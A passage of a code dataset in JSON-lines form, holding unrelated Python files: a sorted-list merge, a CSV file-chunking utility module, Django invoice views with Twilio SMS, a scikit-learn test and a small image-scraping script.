hashed_string in hashes[index+1:index+1001]):\n key_indexes.append(index)\n index += 1\n\nprint(key_indexes[-1])\n","sub_path":"14/14b.py","file_name":"14b.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"138269615","text":"\"\"\"\nGiven two lists that are sorted,\nmerge both of them in ascending order\n\"\"\"\n\ndef mergeSortedLists(l1,l2):\n\n final = []\n \"\"\"\n if l1 is empty -> ret l2\n else if l2 is empty -> ret l1\n else if they're both empty -> ret []\n \"\"\"\n if len(l1) == 0:\n return l2\n elif len(l2) == 0:\n return l1\n elif len(l1) == 0 and len(l2) == 0:\n return final\n\n # set first element of the new list\n if l1[0] < l2[0]:\n final.append(l1.pop(0))\n else:\n final.append(l2.pop(0))\n\n # iterate through both lists and insert\n # in order of the new list\n while len(l1) != 0 or len(l2) != 0:\n if len(l1) == 0:\n while len(l2) != 0:\n final.append(l2.pop(0))\n elif len(l2) == 0:\n while len(l1) != 0:\n final.append(l1.pop(0))\n else:\n if l1[0] < l2[0]:\n final.append(l1.pop(0))\n else:\n final.append(l2.pop(0))\n return final\n\nl1 = [1,3,6,199,500]\n\nl2 = [-312,4,8,16,85,654,700,999]\n\nprint(mergeSortedLists(l1,l2))\n","sub_path":"mergelist.py","file_name":"mergelist.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"9335353","text":"\"\"\"Common file handling tools used in various BISON modules.\"\"\"\nimport csv\nimport glob\nimport logging\nimport math\nimport os\nimport subprocess\nimport sys\n\nfrom bison.common.constants import (DWC_PROCESS, ENCODING, EXTRA_CSV_FIELD, GBIF)\n\n\n# ...............................................\ndef delete_file(file_name, delete_dir=False):\n \"\"\"Delete file if it exists, optionally delete newly empty directory.\n\n Args:\n file_name (str): full path to the file to delete\n delete_dir (bool): flag - True to delete parent directory if it becomes empty\n\n Returns:\n True if file was not found, or file (and optional newly-empty parent directories) was successfully deleted.\n False if failed to delete file (and parent directories).\n \"\"\"\n success = True\n msg = ''\n if file_name is None:\n msg = \"Cannot delete file 'None'\"\n else:\n pth, _ = os.path.split(file_name)\n if file_name is not None and os.path.exists(file_name):\n try:\n os.remove(file_name)\n except Exception as e:\n success = False\n msg = 'Failed to remove {}, {}'.format(file_name, str(e))\n if delete_dir and len(os.listdir(pth)) == 0:\n try:\n os.removedirs(pth)\n except Exception as e:\n success = False\n msg = 'Failed to remove {}, {}'.format(pth, str(e))\n return success, msg\n\n\n# ...............................................\ndef ready_filename(fullfilename, overwrite=True):\n \"\"\"Delete file if it exists, optionally delete newly empty directory.\n\n Args:\n fullfilename (str): full path of the file to check\n overwrite (bool): flag indicating whether to delete the file if it already exists\n\n Returns:\n True if file was not found, or file (and optional newly-empty parent directories) was successfully deleted.\n False if failed to delete file (and parent directories).\n\n Raises:\n PermissionError: if unable to delete existing file when overwrite is true\n Exception: on other delete errors or failure to create directories\n PermissionError: if unable to create missing directories\n Exception: on other mkdir errors\n Exception: on failure to create 
directories\n \"\"\"\n is_ready = True\n if os.path.exists(fullfilename):\n if overwrite:\n try:\n delete_file(fullfilename)\n except PermissionError:\n raise\n except Exception as e:\n raise Exception('Unable to delete {} ({})'.format(fullfilename, e))\n else:\n is_ready = False\n else:\n pth, _ = os.path.split(fullfilename)\n try:\n os.makedirs(pth)\n except FileExistsError:\n pass\n except PermissionError:\n raise\n except Exception:\n raise\n\n if not os.path.isdir(pth):\n raise Exception('Failed to create directories {}'.format(pth))\n\n return is_ready\n\n\n# .............................................................................\ndef get_csv_writer(datafile, delimiter, header=None, fmode=\"w\", overwrite=True):\n \"\"\"Create a CSV writer.\n\n Args:\n datafile: output CSV file for writing\n delimiter: field separator\n header: list of fieldnames to be written as the first line\n fmode: Write ('w') or append ('a')\n overwrite (bool): True to delete an existing file before write\n\n Returns:\n writer (csv.writer) ready to write\n f (file handle)\n\n Raises:\n Exception: on failure to create a csv writer\n FileExistsError: on existing file if overwrite is False\n \"\"\"\n if fmode not in (\"w\", \"a\"):\n raise Exception(\"File mode must be 'w' (write) or 'a' (append)\")\n\n if ready_filename(datafile, overwrite=overwrite):\n csv.field_size_limit(sys.maxsize)\n try:\n f = open(datafile, fmode, newline=\"\", encoding=ENCODING)\n writer = csv.writer(f, delimiter=delimiter, quoting=csv.QUOTE_MINIMAL)\n if header is not None:\n writer.writerow(header)\n except Exception as e:\n raise e\n else:\n raise FileExistsError\n\n return writer, f\n\n\n# .............................................................................\ndef get_csv_dict_writer(csvfile, header, delimiter, fmode=\"w\", encoding=ENCODING, extrasaction=\"ignore\", overwrite=True):\n \"\"\"Create a CSV dictionary writer and write the header.\n\n Args:\n csvfile (str): output CSV filename for writing\n header (list): header for output file\n delimiter (str): field separator\n fmode (str): Write ('w') or append ('a')\n encoding (str): Encoding for output file\n extrasaction (str): Action to take if there are fields in a record dictionary not present in fieldnames\n overwrite (bool): True to delete an existing file before write\n\n Returns:\n writer (csv.DictWriter) ready to write\n f (file handle)\n\n Raises:\n Exception: on invalid file mode\n Exception: on failure to create a DictWriter\n FileExistsError: on existing file if overwrite is False\n \"\"\"\n if fmode not in (\"w\", \"a\"):\n raise Exception(\"File mode must be 'w' (write) or 'a' (append)\")\n if ready_filename(csvfile, overwrite=overwrite):\n csv.field_size_limit(sys.maxsize)\n try:\n f = open(csvfile, fmode, newline=\"\", encoding=encoding)\n writer = csv.DictWriter(f, fieldnames=header, delimiter=delimiter, extrasaction=extrasaction)\n except Exception as e:\n raise e\n else:\n writer.writeheader()\n return writer, f\n else:\n raise FileExistsError\n\n\n# .............................................................................\ndef get_csv_dict_reader(\n csvfile, delimiter, fieldnames=None, encoding=ENCODING, quote_none=False,\n restkey=EXTRA_CSV_FIELD):\n \"\"\"Create a CSV dictionary reader from a file with the first line containing fieldnames.\n\n Args:\n csvfile (str): output CSV file for reading\n delimiter (char): delimiter between fields\n fieldnames (list): strings with corrected fieldnames, cleaned of illegal characters, for use with 
records.\n encoding (str): type of encoding\n quote_none (bool): True opens csvfile with QUOTE_NONE, False opens with QUOTE_MINIMAL\n restkey (str): fieldname for extra fields in a record not present in header\n\n Returns:\n rdr (csv.DictReader): DictReader ready to read\n f (object): open file handle\n\n Raises:\n FileNotFoundError: on missing csvfile\n PermissionError: on improper permissions on csvfile\n \"\"\"\n csv.field_size_limit(sys.maxsize)\n\n if quote_none is True:\n quoting = csv.QUOTE_NONE\n else:\n quoting = csv.QUOTE_MINIMAL\n\n try:\n # If csvfile is a file object, it should be opened with newline=\"\"\n f = open(csvfile, \"r\", newline=\"\", encoding=encoding)\n except FileNotFoundError:\n raise\n except PermissionError:\n raise\n\n if fieldnames is not None:\n rdr = csv.DictReader(f, fieldnames=fieldnames, quoting=quoting, delimiter=delimiter, restkey=restkey)\n else:\n rdr = csv.DictReader(f, quoting=quoting, delimiter=delimiter, restkey=restkey)\n\n return rdr, f\n\n\n# .............................................................................\ndef _check_existence(filename_or_pattern):\n is_pattern = True\n # Wildcards?\n try:\n filename_or_pattern.index(\"*\")\n except ValueError:\n try:\n filename_or_pattern.index(\"?\")\n except ValueError:\n is_pattern = False\n if is_pattern:\n files = glob.glob(filename_or_pattern)\n if len(files) == 0:\n raise FileNotFoundError(f\"No files match the pattern {filename_or_pattern}\")\n elif not os.path.exists(filename_or_pattern):\n raise FileNotFoundError(f\"File {filename_or_pattern} does not exist\")\n\n return is_pattern\n\n\n# .............................................................................\ndef _parse_wc_output(subproc_output):\n # Return has list of byte-strings, the first contains one or more output lines, the last byte-string is empty.\n # Multiple matching files will produce multiple lines, with total on the last line\n output = subproc_output[0]\n lines = output.split(b\"\\n\")\n # The last line is empty\n lines = lines[:-1]\n line_of_interest = None\n # Find and split line of interest\n if len(lines) == 1:\n line_of_interest = lines[0]\n else:\n for ln in lines:\n try:\n ln.index(b\"total\")\n except ValueError:\n pass\n else:\n line_of_interest = ln\n if line_of_interest is None:\n raise Exception(f\"Failed to get line with results from {subproc_output}\")\n elts = line_of_interest.strip().split(b\" \")\n # Count is first element in line\n tmp = elts[0]\n try:\n line_count = int(tmp)\n except ValueError:\n raise Exception(f\"First element on results line {line_of_interest} is not an integer\")\n return line_count\n\n\n# .............................................................................\ndef _parse_cat_output(subproc_output):\n # Return has list of byte-strings, the first contains one or more output lines, the last byte-string is empty.\n # Multiple matching files will produce multiple lines, with total on the last line\n output = subproc_output[0]\n lines = output.split(b\"\\n\")\n line_of_interest = lines[0]\n if line_of_interest is None:\n raise Exception(f\"Failed to get line with results from {subproc_output}\")\n elts = line_of_interest.strip().split(b\"\\t\")\n # Count is first element in line\n tmp = elts[0]\n try:\n line_count = int(tmp)\n except ValueError:\n raise Exception(f\"First element on results line {line_of_interest} is not an integer\")\n return line_count\n\n\n# .............................................................................\ndef 
count_lines(filename_or_pattern, grep_strings=None):\n \"\"\"Find total number of lines in a file.\n\n Args:\n filename_or_pattern (str): filepath, with or without wildcards, to count lines for\n grep_strings (list): list of strings to find in lines\n\n Returns:\n line_count (int): number of lines in the file containing all of the strings in str_list\n\n Raises:\n FileNotFoundError: file pattern matches no files\n FileNotFoundError: file does not exist\n\n Assumptions:\n Existence of the command line tool \"grep\".\n Existence of the command line tool \"wc\"\n Output of \"wc\" consists of one or more lines with the pattern: \n If more than one file is being examined, the last line will have the pattern: total\n \"\"\"\n line_count = None\n try:\n _check_existence(filename_or_pattern)\n except FileNotFoundError:\n raise\n\n # Assemble bash command\n if grep_strings is not None:\n # start with grep command\n st = grep_strings.pop(0)\n cmd = f\"grep {st} {filename_or_pattern} | \"\n # add additional grep commands\n while len(grep_strings) > 0:\n st = grep_strings.pop(0)\n cmd += f\"grep {st} | \"\n # count output produced from greps\n cmd += \"wc -l\"\n else:\n # count all lines\n cmd = f\"wc -l {filename_or_pattern}\"\n\n # Run command in a shell\n sp = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n sp_outs = sp.communicate()\n\n # Retrieve the total count\n line_count = _parse_wc_output(sp_outs)\n\n return line_count\n\n\n# .............................................................................\ndef count_lines_with_cat(filename_or_pattern):\n \"\"\"Find total number of lines in a file.\n\n Args:\n filename_or_pattern (str): filepath, with or without wildcards, to count lines for\n\n Returns:\n line_count (int): number of lines in the file\n\n Raises:\n FileNotFoundError: file pattern matches no files\n FileNotFoundError: file does not exist\n\n Assumptions:\n Existence of the command line tool \"cat\".\n Existence of the command line tool \"tail\"\n \"\"\"\n line_count = None\n try:\n _check_existence(filename_or_pattern)\n except FileNotFoundError:\n raise\n cmd = f\"cat -n {filename_or_pattern} | tail -n1\"\n\n # Run command in a shell\n sp = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n sp_outs = sp.communicate()\n\n # Retrieve the total count\n line_count = _parse_cat_output(sp_outs)\n\n return line_count\n\n\n# .............................................................................\ndef available_cpu_count():\n \"\"\"Number of available virtual or physical CPUs on this system.\n\n Returns:\n int for the number of CPUs available\n\n Raises:\n Exception: on failure of all CPU count queries.\n\n Notes:\n code from https://stackoverflow.com/questions/1006289\n \"\"\"\n # Python 2.6+\n try:\n import multiprocessing\n return multiprocessing.cpu_count()\n except (ImportError, NotImplementedError):\n pass\n\n # https://github.com/giampaolo/psutil\n try:\n import psutil\n return psutil.cpu_count() # psutil.NUM_CPUS on old versions\n except (ImportError, AttributeError):\n pass\n\n # POSIX\n try:\n res = int(os.sysconf('SC_NPROCESSORS_ONLN'))\n if res > 0:\n return res\n except (AttributeError, ValueError):\n pass\n\n # Windows\n try:\n res = int(os.environ['NUMBER_OF_PROCESSORS'])\n if res > 0:\n return res\n except (KeyError, ValueError):\n pass\n\n # Linux\n try:\n res = open('/proc/cpuinfo').read().count('processor\\t:')\n if res > 0:\n return res\n except IOError:\n pass\n\n raise Exception('Can not 
determine number of CPUs on this system')\n\n\n# .............................................................................\ndef get_fields_from_header(csvfile, delimiter=GBIF.DWCA_DELIMITER, encoding=\"utf-8\"):\n \"\"\"Find fields in a header in a delimited text file.\n\n Args:\n csvfile (str): comma/tab-delimited file with header\n delimiter (str): single character delimiter between fields\n encoding (str): encoding of the file\n\n Returns:\n list: of strings indicating fieldnames\n\n Raises:\n FileNotFoundError: file does not exist\n Exception: unknown read error\n \"\"\"\n fields = []\n try:\n _check_existence(csvfile)\n except FileNotFoundError:\n raise\n\n # Open file and read first line\n try:\n f = open(csvfile, \"r\", newline=\"\", encoding=encoding)\n line = f.readline()\n line = line.strip()\n fields = line.split(delimiter)\n except Exception:\n raise\n finally:\n f.close()\n\n return fields\n\n\n# .............................................................................\nclass Chunker():\n @classmethod\n def identify_chunks(cls, big_csv_filename, chunk_count=0):\n \"\"\"Determine the start and stop lines in a large file that will make up the contents of smaller subsets of the file.\n\n The purpose of chunking the files is to split the large file into more manageable chunks that can be processed\n concurrently by the CPUs on the local machine.\n\n Args:\n big_csv_filename (str): Full path to the original large CSV file of records\n chunk_count (int): Number of smaller files to split large file into. Defaults\n to the number of available CPUs minus 2.\n\n Returns:\n start_stop_pairs: a list of tuples, containing pairs of line numbers in the original file that will be the first\n and last record of a subset chunk of the file.\n \"\"\"\n if chunk_count == 0:\n chunk_count = available_cpu_count() - 2\n start_stop_pairs = []\n\n # in_base_filename, ext = os.path.splitext(big_csv_filename)\n if big_csv_filename.endswith(GBIF.INPUT_DATA):\n # shortcut\n rec_count = GBIF.INPUT_RECORD_COUNT\n else:\n rec_count = count_lines(big_csv_filename) - 1\n chunk_size = math.ceil(rec_count / chunk_count)\n\n start = 1\n stop = chunk_size\n start_stop_pairs.append((start, stop))\n\n while stop < rec_count:\n # chunk_filename = f\"{in_base_filename}_chunk-{start}-{stop}{ext}\"\n\n # Advance for next chunk\n start = stop + 1\n stop = min((start + chunk_size - 1), rec_count)\n start_stop_pairs.append((start, stop))\n\n return start_stop_pairs, rec_count, chunk_size\n\n # .............................................................................\n @classmethod\n def identify_chunk_files(cls, big_csv_filename, chunk_count=0):\n \"\"\"Construct filenames for smaller files subset from a large file.\n\n Args:\n big_csv_filename (str): Full path to the original large CSV file of records\n chunk_count (int): Number of smaller files to split large file into. 
Defaults\n to the number of available CPUs minus 2.\n\n Returns:\n chunk_filenames: a list of chunk filenames\n \"\"\"\n chunk_filenames = []\n in_base_filename, ext = os.path.splitext(big_csv_filename)\n boundary_pairs, _rec_count, _chunk_size = cls.identify_chunks(\n big_csv_filename, chunk_count=chunk_count)\n for (start, stop) in boundary_pairs:\n chunk_fname = BisonNameOp.get_chunk_filename(\n in_base_filename, ext, start, stop)\n chunk_filenames.append(chunk_fname)\n return chunk_filenames\n\n # .............................................................................\n @classmethod\n def chunk_files(cls, big_csv_filename, output_path, logger, chunk_count=0):\n \"\"\"Split a large input csv file into multiple smaller input csv files.\n\n Args:\n big_csv_filename (str): Full path to the original large CSV file of records\n output_path (str): Destination directory for chunked files.\n logger (object): logger for writing messages to file and console\n chunk_count (int): Number of smaller files to split large file into. Defaults\n to the number of available CPUs minus 2.\n\n Returns:\n chunk_filenames: a list of chunk filenames\n\n Raises:\n Exception: on failure to open or write to a chunk file\n Exception: on failure to open or read the big_csv_filename\n\n Note:\n Write chunk file records exactly as read, no corrections applied.\n \"\"\"\n refname = \"chunk_files\"\n inpath, base_filename = os.path.split(big_csv_filename)\n basename, ext = os.path.splitext(base_filename)\n chunk_filenames = []\n boundary_pairs, rec_count, chunk_size = cls.identify_chunks(\n big_csv_filename, chunk_count=chunk_count)\n\n try:\n bigf = open(big_csv_filename, 'r', newline=\"\", encoding='utf-8')\n header = bigf.readline()\n line = bigf.readline()\n big_recno = 1\n\n for (start, stop) in boundary_pairs:\n chunk_basefilename = BisonNameOp.get_chunk_filename(\n basename, ext, start, stop)\n chunk_fname = os.path.join(output_path, chunk_basefilename)\n\n try:\n # Start writing the smaller file\n chunkf = open(chunk_fname, 'w', newline=\"\", encoding='utf-8')\n chunkf.write('{}'.format(header))\n\n while big_recno <= stop and line:\n try:\n # Write last line to chunk file\n chunkf.write(f\"{line}\")\n except Exception as e:\n # Log error and move on\n logger.log(\n f\"Failed on bigfile {big_csv_filename} line number \"\n f\"{big_recno} writing to {chunk_fname}: {e}\",\n refname=refname, log_level=logging.ERROR)\n # If bigfile still has lines, get next one\n if line:\n line = bigf.readline()\n big_recno += 1\n else:\n big_recno = stop + 1\n\n except Exception as e:\n print(f\"Failed opening or writing to {chunk_fname}: {e}\")\n raise\n finally:\n # After got to stop, close and add filename to list\n chunkf.close()\n logger.log(\n f\"Wrote lines {start} to {stop} to {chunk_fname}\", refname=refname)\n chunk_filenames.append(chunk_fname)\n\n except Exception as e:\n logger.log(\n f\"Failed to read bigfile {big_csv_filename}: {e}\", refname=refname,\n log_level=logging.ERROR)\n raise\n finally:\n bigf.close()\n report = {\n \"large_filename\": big_csv_filename,\n \"chunked_files\": chunk_filenames,\n \"record_count\": rec_count,\n \"chunk_size\": chunk_size\n }\n\n return chunk_filenames, report\n\n\n# .............................................................................\nclass BisonNameOp():\n\n @staticmethod\n def get_annotated_riis_filename(input_riis_filename, outpath=None):\n \"\"\"Construct a filename for a chunk of CSV records.\n\n Args:\n input_riis_filename (str): full filename of the 
original RIIS data.\n outpath (str): destination directory for the annotated RIIS data. Defaults\n to the same path as the input file if not provided.\n\n Returns:\n out_filename: full filename for the output file.\n \"\"\"\n basename, ext = os.path.splitext(os.path.split(input_riis_filename)[1])\n out_filename = os.path.join(outpath, f\"{basename}_annotated.csv\")\n return out_filename\n\n @staticmethod\n def get_chunk_filename(basename, ext, start, stop):\n \"\"\"Construct a filename for a chunk of CSV records.\n\n Args:\n basename (str): base filename of the original large CSV data.\n ext (str): extension of the filename\n start (int): record number in original file of first record for data chunk.\n stop (int): record number in original file of last record for data chunk.\n\n Returns:\n str: base filename for the subset file.\n\n Note:\n File will always start with basename,\n followed by chunk\n followed by process step completed (if any)\n \"\"\"\n postfix = DWC_PROCESS.CHUNK['postfix']\n sep = DWC_PROCESS.SEP\n chunkfix = f\"{DWC_PROCESS.CHUNK['prefix']}-{start}-{stop}\"\n return f\"{basename}{sep}{chunkfix}{sep}{postfix}{ext}\"\n\n # .............................................................................\n @staticmethod\n def get_out_process_filename(in_filename, outpath=None, step_or_process=None):\n \"\"\"Construct output filename for the next processing step of the given file.\n\n Args:\n in_filename (str): base or full filename of CSV data.\n outpath (str): destination directory for output filename\n step_or_process (int or lmbison.common.constants.DWC_PROCESS):\n stage of processing completed on the output file.\n\n Returns:\n out_fname: base or full filename of output file, given the input filename.\n If the input filename reflects the final processing step, the method\n returns None\n\n Raises:\n Exception: on illegal step or final process as input filename\n\n Note:\n The input filename is parsed for process step, and the output filename will\n be constructed for the next step.\n\n File will always start with basename, followed by chunk,\n followed by process step completed (if any)\n \"\"\"\n outfname = None\n path, basename, ext, chunk, postfix = BisonNameOp.parse_process_filename(\n in_filename)\n if chunk is not None:\n basename = f\"{basename}{DWC_PROCESS.SEP}{chunk}\"\n # If step is not provided, get the step after that of the input file.\n if step_or_process is None:\n step_or_process = DWC_PROCESS.get_step(postfix) + 1\n new_postfix = DWC_PROCESS.get_postfix(step_or_process)\n if new_postfix is None:\n raise Exception(\n f\"No next step for {in_filename} or processing step for \"\n f\"{step_or_process}\")\n else:\n outbasename = f\"{basename}{DWC_PROCESS.SEP}{new_postfix}{ext}\"\n # If outpath is not provided, use the same path as the input file.\n if outpath is None:\n outpath = path\n outfname = os.path.join(outpath, outbasename)\n return outfname\n\n # .............................................................................\n @staticmethod\n def parse_process_filename(filename):\n \"\"\"Parse a filename into path, basename, chunk, processing step, extension.\n\n Args:\n filename (str): A filename used in processing\n\n Returns:\n path: file path of the filename, if included\n basename: basename of the filename\n ext: extension of the filename\n chunk: the chunk string, chunk--, where start and stop indicate\n the record (line+1) numbers in the original datafile.\n process_postfix: the postfix of the file, indicating which stage of\n processing has been 
completed.\n\n Note:\n File will always start with basename,\n followed by chunk (if chunked)\n followed by process step completed (if any)\n \"\"\"\n chunk = None\n process_postfix = None\n # path will be None if filename is basefilename\n path, fname = os.path.split(filename)\n basefname, ext = os.path.splitext(fname)\n parts = basefname.split(DWC_PROCESS.SEP)\n # File will always start with basename\n basename = parts.pop(0)\n if len(parts) >= 1:\n p = parts.pop(0)\n # if chunk exists\n if not p.startswith(DWC_PROCESS.CHUNK[\"prefix\"]):\n process_postfix = p\n else:\n chunk = p\n if len(parts) >= 1:\n process_postfix = parts.pop(0)\n return path, basename, ext, chunk, process_postfix\n\n # ...............................................\n @classmethod\n def get_raw_summary_name(cls, csvfile):\n \"\"\"Construct a filename for the summarized version of annotated csvfile.\n\n Args:\n csvfile (str): full filename used to construct an annotated filename for\n this data.\n\n Returns:\n outfname: output filename derived from the annotated GBIF DWC filename\n \"\"\"\n basename, ext = os.path.splitext(csvfile)\n outfname = f\"{basename}_summary{ext}\"\n return outfname\n\n # ...............................................\n @classmethod\n def get_combined_summary_name(cls, csvfile, outpath=None):\n \"\"\"Construct a filename for the summarized version of annotated csvfile.\n\n Args:\n csvfile (str): full filename of one subset summary file (of one or more) for\n this data.\n outpath (str): full directory path for output filename.\n\n Returns:\n outfname: output filename derived from the summarized GBIF DWC filename\n \"\"\"\n path, basename, ext, chunk, postfix = BisonNameOp.parse_process_filename(\n csvfile)\n postfix = DWC_PROCESS.COMBINE[\"postfix\"]\n outbasename = f\"{basename}{DWC_PROCESS.SEP}{postfix}{ext}\"\n # If outpath is not provided, use the same path as the input file.\n if outpath is None:\n outpath = path\n outfname = os.path.join(outpath, outbasename)\n return outfname\n\n # ...............................................\n @staticmethod\n def get_location_summary_name(outpath, region_type, region):\n \"\"\"Construct a filename for the summary file for a region.\n\n Args:\n outpath (str): full directory path for output filename.\n region_type (str): file prefix indicating region type\n region (str): name of region\n\n Returns:\n outfname: output filename derived from the state and county\n \"\"\"\n basename = f\"{region_type}_{region}.csv\"\n outfname = os.path.join(outpath, basename)\n return outfname\n\n # ...............................................\n @staticmethod\n def get_assessment_summary_name(csvfile, outpath):\n \"\"\"Construct a filename for the RIIS assessment summary file.\n\n Args:\n csvfile (str): full filename of one subset summary file (of one or more) for\n this data.\n outpath (str): full directory path for output filename.\n\n Returns:\n outfname: output filename\n \"\"\"\n _path, basename, ext, _chunk, _postfix = BisonNameOp.parse_process_filename(\n csvfile)\n outfname = os.path.join(outpath, f\"{basename}_riis_summary{ext}\")\n return outfname\n\n # # ...............................................\n # @staticmethod\n # def parse_location_summary_name(csvfile):\n # \"\"\"Construct a filename for the summarized version of csvfile.\n #\n # Args:\n # csvfile (str): full filename used to construct an annotated filename\n # for this data.\n #\n # Returns:\n # outfname: output filename derived from the annotated GBIF DWC filename\n #\n # Raises:\n # 
Exception: on filename does not start with \"state_\" or \"county_\"\n # \"\"\"\n # county = None\n # _, basefilename = os.path.split(csvfile)\n # basename, ext = os.path.splitext(basefilename)\n # if basename.startswith(\"state_\"):\n # _, state = basename.split(\"_\")\n # elif basename.startswith(\"county_\"):\n # _, state, county = basename.split(\"_\")\n # else:\n # raise Exception(\n # f\"Filename {csvfile} cannot be parsed into location elements\")\n # return state, county\n\n\n# .............................................................................\n__all__ = [\n \"available_cpu_count\",\n \"count_lines\",\n \"delete_file\",\n \"get_csv_dict_reader\",\n \"get_csv_dict_writer\",\n \"get_csv_writer\",\n \"ready_filename\"\n]\n","sub_path":"bison/common/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":31240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"310919610","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import View\nfrom twilio.rest import Client\nfrom .models import Bill, Product\nfrom .forms import BillForm, ProductForm\n\n\ndef dashboard(request):\t\t#Shows the list of all the stored bills\n\tbills = Bill.objects.all().order_by('-created')[:10]\n\tcontext = {\n\t\t'bills': bills\n\t}\n\treturn render(request, 'bill/dashboard.html', context)\n\n\ndef detail(request, id):\t#A detail view of that Bill id\n\tbill = get_object_or_404(Bill, id=id)\n\tproducts = bill.product_set.all()\n\tcontext = {\n\t\t'bill': bill,\n\t\t'products': products\n\t}\n\treturn render(request, 'bill/summary.html', context)\n\n\ndef new_bill(request):\n\tbill = BillForm(request.POST or None)\n\tif bill.is_valid():\n\t\t\tbill = bill.save()\n\t\t\treturn redirect('bill:products', bill.id)\n\tcontext = {\n\t\t'bill': bill\n\t}\n\treturn render(request, 'bill/new_bill.html', context)\n\n\ndef products(request, id):\n\tbill = get_object_or_404(Bill, id=id)\n\tproducts = bill.product_set.all()\n\tadd_product = ProductForm(request.POST or None)\n\tif add_product.is_valid():\n\t\tadd_product = add_product.save(commit=False)\n\t\tadd_product.taxable_value = add_product.rate * add_product.quantity\n\t\tif add_product.discount > 0:\n\t\t\tadd_product.taxable_value = add_product.taxable_value - (add_product.taxable_value*(add_product.discount/100))\n\t\tadd_product.cgst_amount = add_product.taxable_value * (float(add_product.cgst_rate)/100)\n\t\tadd_product.sgst_amount = add_product.taxable_value * (float(add_product.sgst_rate)/100)\n\t\tadd_product.igst_amount = add_product.taxable_value * (float(add_product.igst_rate)/100)\n\t\tif add_product.igst_amount != 0:\n\t\t\tadd_product.amount = add_product.taxable_value + add_product.igst_amount\n\t\telse:\n\t\t\tadd_product.amount = add_product.taxable_value + add_product.cgst_amount + add_product.sgst_amount\n\t\tbill.total = bill.total + add_product.amount\n\t\tbill.invoice = \"RC{0}9{1}\".format(bill.date_of_issue.strftime(\"%y%m%d\"), bill.id)\n\t\tadd_product.bill = bill\n\t\tadd_product.save()\n\t\tbill.save()\n\t\treturn redirect('bill:products', id)\n\n\tcontext = {\n\t\t'bill': bill,\n\t\t'products': products,\n\t\t'add_product': add_product\t}\n\treturn render(request, 'bill/new_product.html', context)\n\n\ndef send_sms(request, id):\n\tprint(\"YO\")\n\tbill = get_object_or_404(Bill, id = id)\n\tto = \"+91{0}\".format(bill.buyer_mobile)\n\tmessage = \"Your invoice no. is {}. 
And the amount payable is ₹{}\".format(bill.invoice, bill.total)\n\taccount_sid = os.environ['TWILIO_ACCOUNT_SID']\n\tauth_token = os.environ['TWILIO_AUTH_TOKEN']\n\tclient = Client(account_sid, auth_token)\n\tprint(\"Object Created\")\n\t\n\ttry:\n\t\tclient.messages.create(\n\t\t to = to,\n\t\t from_ = os.environ['TWILIO_NUMBER'],\n\t\t body = message\n\t )\n\texcept Exception as e:\n\t\tprint(e)\n\n\tprint(\"Passed the send_sms\")\n\treturn redirect('bill:summary', id)\n\n\ndef history(request):\n\tbills = Bill.objects.all().order_by('-created')\n\treturn render(request, 'bill/history.html', { 'bills': bills })","sub_path":"invoicer/bill/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"256831688","text":"@ignore_warnings(category=RuntimeWarning)\ndef test_warm_start():\n X = X_iris\n y = y_iris\n y_2classes = np.array((([0] * 75) + ([1] * 75)))\n y_3classes = np.array(((([0] * 40) + ([1] * 40)) + ([2] * 70)))\n y_3classes_alt = np.array(((([0] * 50) + ([1] * 50)) + ([3] * 50)))\n y_4classes = np.array((((([0] * 37) + ([1] * 37)) + ([2] * 38)) + ([3] * 38)))\n y_5classes = np.array(((((([0] * 30) + ([1] * 30)) + ([2] * 30)) + ([3] * 30)) + ([4] * 30)))\n clf = MLPClassifier(hidden_layer_sizes=2, solver='lbfgs', warm_start=True).fit(X, y)\n clf.fit(X, y)\n clf.fit(X, y_3classes)\n for y_i in (y_2classes, y_3classes_alt, y_4classes, y_5classes):\n clf = MLPClassifier(hidden_layer_sizes=2, solver='lbfgs', warm_start=True).fit(X, y)\n message = ('warm_start can only be used where `y` has the same classes as in the previous call to fit. Previously got [0 1 2], `y` has %s' % np.unique(y_i))\n assert_raise_message(ValueError, message, clf.fit, X, y_i)","sub_path":"Data Set/bug-fixing-5/8e310cd82698fa88108ad51f708dc7cad56a3039--bug.py","file_name":"8e310cd82698fa88108ad51f708dc7cad56a3039--bug.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"434271403","text":"import sys\nimport io\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\nimport os\nimport urllib.request as req\nfrom bs4 import BeautifulSoup as be\nimport urllib.parse as rep\n\n\nbase = \"https://www.inflearn.com/\"\nquote = rep.quote_plus(\"추천-강좌\")\nurl = base + quote\n\nres = req.urlopen(url).read()\nsavePath = \"D:/python/Crawling/section2/downimg/\"\n\n# 이미지 폴더 확인 및 생성 하기\ntry:\n if not (os.path.isdir(savePath)):\n os.makedirs(os.path.join(savePath))\n\nexcept OSError:\n if e.errno != errno.EExist:\n print(\"폴더 만들기 실패!!\")\n raise\n\n\nsoup = be(res,\"html.parser\")\n\nimg_list = soup.select(\"ul.slides\")[1]\n\nprint(img_list)\n\nfor i,e in enumerate(img_list,1):\n with open(savePath+\"text_\"+str(i)+\".txt\",\"wt\") as f:\n f.write(e.select_one(\"h4.block_title > a\").string)\n\n fullFileName = os.path.join(savePath,savePath+str(i)+'.png')\n req.urlretrieve(e.select_one(\"div.block_media > a > img\")['src'],fullFileName)\n\nprint(\"download OK!!\")\n","sub_path":"download5-2.py","file_name":"download5-2.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"650339454","text":"# -*- coding: utf-8 -*-\r\n# CI *4HC595\r\n# clock = 